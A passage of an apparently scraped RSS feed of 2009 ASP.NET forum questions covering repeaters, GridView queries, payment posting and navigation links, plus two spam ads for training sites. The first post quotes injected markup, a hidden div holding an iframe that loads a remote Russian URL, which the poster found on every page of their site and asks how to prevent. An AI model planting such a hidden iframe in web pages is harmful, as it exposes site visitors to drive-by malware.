&amp;lt;div style="display:none"&amp;gt;eyryqyngxqodqmlyrudqusfyorybd
so&amp;lt;iframe width=420 height=816 src="http://bio-a.ru:8080/index.php" &amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
"&lt;br /&gt;
was attached automatically to every page of that website automatically, please help me to find, why and how this happened, and how to avoid such problems&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/407258/407258/problem-code-getting-attached-to-aspnet-pages-automatically/</guid>
      <pubDate>Thu, 15 Oct 2009 01:31:14 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Modify repeter control</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/405419/405419/modify-repeter-control/</link>
      <description>I have a requirement where repeater code would be like:-&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;asp:Repeater ID="test" runat="server"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;ItemTemplate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;Description&amp;gt;&amp;lt;/Description&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;Itemno&amp;gt;&amp;lt;/Itemno&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;ListPrice&amp;gt;&amp;lt;/ListPrice&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;/ItemTemplate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/asp:Repeater&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
This has to be rendered as:-&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;asp:Repeater ID="test" runat="server"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;ItemTemplate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;%# Eval("Description") %&amp;gt; &lt;br /&gt;
&lt;br /&gt;
         &amp;lt;%# Eval("Itemno") %&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        &amp;lt;%# Eval("ListPrice") %&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;/ItemTemplate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/asp:Repeater&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
I am planning to change the repeaters itemtemplate from codebehind.&lt;br /&gt;
&lt;br /&gt;
Kindly let me know if there is a possible way of doing this. If not then what can be the alternate starategy to make it work.&lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/405419/405419/modify-repeter-control/</guid>
      <pubDate>Mon, 12 Oct 2009 08:37:20 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Dynamically Changing SQL Select statement for a GridView</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/403964/403964/dynamically-changing-sql-select-statement-for-a-gridview/</link>
      <description>Hi,&lt;br /&gt;
&lt;br /&gt;
I'm using Visual Studio 2005, which I am new too. &lt;br /&gt;
&lt;br /&gt;
My project has a lot of code tables, which all need to be able to be updated.  I am trying to come up with a single page to update them all rather than 50+ seperate pages.&lt;br /&gt;
&lt;br /&gt;
So I have a drop down list allowing the user to select the table they want to update.  THen I want to populate the GridView with the records from the appropriat code table.&lt;br /&gt;
&lt;br /&gt;
If tried to update the datasource select statement programatically but that doesn't seem to work.  I couldpossibly have 50+ datasources and change the datasource, but I'm looking for a more elegent solution.  Any suggestions or recommendations? &lt;br /&gt;
&lt;br /&gt;
THanks in advance!&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/403964/403964/dynamically-changing-sql-select-statement-for-a-gridview/</guid>
      <pubDate>Fri, 09 Oct 2009 08:12:18 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>online software training at single click</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/402604/402604/online-software-training-at-single-click/</link>
      <description>&lt;a href="http://www.wingslive.com"&gt;Wingslive&lt;/a&gt; is an online computer software, Softskills training website with more than 50 software courses at lowest cost compared with all online trainers.. &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.wingslive.com/Ws_wl_Web_free_Courses.aspx"&gt;&lt;br /&gt;
Available courese&lt;/a&gt; :http://www.wingslive.com/Ws_wl_Web_free_Courses.aspx&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.wingslive.com"&gt;site URL&lt;/a&gt;:http://www.wingslive.com&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/402604/402604/online-software-training-at-single-click/</guid>
      <pubDate>Wed, 07 Oct 2009 11:50:34 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>payment online domain validation</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/401662/401662/payment-online-domain-validation/</link>
      <description>Hi,&lt;br /&gt;
&lt;br /&gt;
Greetings!&lt;br /&gt;
&lt;br /&gt;
I have a problem w/ posting my form onto an internet payment system called enets.&lt;br /&gt;
&lt;br /&gt;
they told us that we need to pass them 3 values: amount, txnRef, mid&lt;br /&gt;
&lt;br /&gt;
and also, they told us the our system needs to be posting from our domain, site.com lets say.&lt;br /&gt;
&lt;br /&gt;
my question is.. how should i code or let that site know that my system is coming from this domain?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
under web.config file, i configured the domain to be :&lt;br /&gt;
&amp;lt;authentication mode="Forms"&amp;gt;&lt;br /&gt;
&amp;lt;forms defaultUrl="site.com" domain="site.com" timeout="120" slidingExpiration="true" loginUrl="~\Login.aspx"/&amp;gt;&lt;br /&gt;
&amp;lt;/authentication&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
under Confirmation.aspx ( have site.master )&lt;br /&gt;
&lt;br /&gt;
METHOD # 1: based on the document, do as how asp / php do, under html: &lt;br /&gt;
&amp;lt;form id="form1" runat="server" method="post" action="site.com"&amp;gt;&lt;br /&gt;
&amp;lt;input type="hidden" name="amount" value="xxx"/&amp;gt;&lt;br /&gt;
&amp;lt;input type="hidden" name="txnRef" value="xxx"/&amp;gt;&lt;br /&gt;
&amp;lt;input type="hidden" name="mid" value="xxx"/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
METHOD # 2: asp.net &lt;br /&gt;
inside code-behind of confirmation.aspx (button click event) : straight&lt;br /&gt;
forward sample&lt;br /&gt;
Response.Redirect("https://site.com.enps.do?amount
=xxx&amp;amp;txnRef=xxx&amp;amp;mid=xxx")&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Both method are going to the site, but with the error : "Invalid Merchant web url" &amp;lt;--- just an error created by them&lt;br /&gt;
&lt;br /&gt;
advance thanks!&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/401662/401662/payment-online-domain-validation/</guid>
      <pubDate>Fri, 02 Oct 2009 04:10:14 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>Free coupon live online Software training</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/401060/401060/free-coupon-live-online-software-training/</link>
      <description>Free Course Link: &lt;a href="http://miruslearning.com/en/courses?page=shop.browse&amp;category_id=14"&gt;http://miruslearning.com/en/courses?page=shop.browse&amp;amp;category_id=14 &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
I stumbled upon this website for live online software training. There is a free oarcle sql course course available. &lt;br /&gt;
&lt;br /&gt;
They are having $200 off on various hot courses. Their original prices are also very less than others. Very good timings full day, evening and weekend courses. &lt;br /&gt;
Worth checking in this job market to keep your skill up to date! &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://MirusLearning.com"&gt;http://MirusLearning.com&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
Coupon Code: soft$200off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/401060/401060/free-coupon-live-online-software-training/</guid>
      <pubDate>Mon, 28 Sep 2009 21:11:13 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>need help changing a top navigation items link</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/399071/399071/need-help-changing-a-top-navigation-items-link/</link>
      <description>Hi,&lt;br /&gt;
&lt;br /&gt;
I am new so if this is not the place, please let me know&lt;br /&gt;
&lt;br /&gt;
My problem is this:&lt;br /&gt;
&lt;br /&gt;
I have a site with a top navigation and left nav. The site is all .aspx pages. Someone quit and I have been tasked with updates.&lt;br /&gt;
&lt;br /&gt;
For example, I was asked to rename one of the top nav items and create a page with specific content. The issue is that when I update the page name, it works for this specific page. If I go to a different page, I see the old name and old link. How do I update a link universally when the structure on a page(default.aspx in this example) looks like the below?? It looks like HyperLink ID should be something I can update once and have it update globally? If so where does one typically go to do something like that? Again sorry if I am in wrong place.&lt;br /&gt;
&lt;br /&gt;
Thanks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;asp:HyperLink ID="lnkCourses" runat="server" NavigateUrl="~/marketing/marketing.aspx"&amp;gt;Marketing&amp;lt
;/asp:HyperLink&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
                                    &lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/399071/399071/need-help-changing-a-top-navigation-items-link/</guid>
      <pubDate>Mon, 21 Sep 2009 18:01:36 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
    <item>
      <title>How to use IN () syntax in asp.net datasets (xsd)</title>
      <link>http://www.programmersheaven.com/mb/ASPNET/398909/398909/how-to-use-in--syntax-in-aspnet-datasets-xsd/</link>
      <description>Hi,&lt;br /&gt;
&lt;br /&gt;
I use Visual studio datasets to create table adapters etc. for queries. This normally works fine for me with 'simple' queries (i.e. only 1 parameter of type string, int ...). However if I specify the following query in the dataset:&lt;br /&gt;
&lt;br /&gt;
SELECT * from tblTable WHERE tblId IN (@idList)&lt;br /&gt;
&lt;br /&gt;
the query editor accepts, but the generated code will create a function that just accepts a single integer. Changing the type of idList to string and passing in a string in the form of "1,2,3" also doesn't work.&lt;br /&gt;
&lt;br /&gt;
Is it at all possible to use the IN keyword in queries using the datasets, and if so, what is the way to do this?&lt;br /&gt;
&lt;br /&gt;
Thanks very much in advance!&lt;br /&gt;
&lt;br /&gt;
Arthur &lt;br /&gt;</description>
      <guid isPermaLink="true">http://www.programmersheaven.com/mb/ASPNET/398909/398909/how-to-use-in--syntax-in-aspnet-datasets-xsd/</guid>
      <pubDate>Mon, 21 Sep 2009 03:15:37 -0700</pubDate>
      <category>ASP.NET</category>
    </item>
  </channel>
</rss>